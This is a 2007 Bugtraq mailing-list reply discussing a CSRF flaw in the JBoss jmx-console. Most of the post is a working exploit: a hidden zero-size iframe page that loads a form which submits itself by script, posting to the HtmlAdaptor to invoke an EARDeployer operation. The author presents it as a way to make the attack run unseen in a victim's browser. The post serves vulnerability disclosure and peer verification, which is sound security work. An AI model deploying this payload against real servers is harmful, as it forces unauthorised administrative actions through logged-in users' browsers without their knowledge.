Date: Fri, 23 Feb 2007 00:21:06 +0000
From: pagvac <unknown.pentester@...il.com>
To: "buben.razuma@...il.com" <buben.razuma@...il.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: JBoss jmx-console CSRF

Hey dude!

What's the authentication mechanism used by JBoss console? A login
HTML form, or HTTP basic auth? If it's the first one and cookies are
used as session tokens your exploit should work (the web browser will
submit the cookie to the target IP/domain when the evil page is
visited).

Although I haven't verified it, it should work as long as the requests
are not tokenized with some dynamic random value.

You might want to remove the submit button and make the form submitted
automatically in the background by calling it from an iframe:

<!-- start of evil.html -->
<iframe src="./POST_request.html" height="0" width="0" frameborder="0"></iframe>
<!-- end of evil.html -->

<!-- start of POST_request.html -->
<form method="post" name="evil"
action="http://host:port/jmx-console/HtmlAdaptor">
    <input type="hidden" name="action" value="invokeOp">
    <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer">
     <input type="hidden" name="methodIndex" value="0">
</form>

<script>document.evil.submit();</script>
<!-- end of POST_request.html -->

You might be interested in the following posts that discuss CSRF
hacking techniques:

http://www.gnucitizen.org/blog/csrf-ing-blogger-classic
http://www.gnucitizen.org/blog/cross-site-request-forgery/

Can anyone verify this CSRF issue?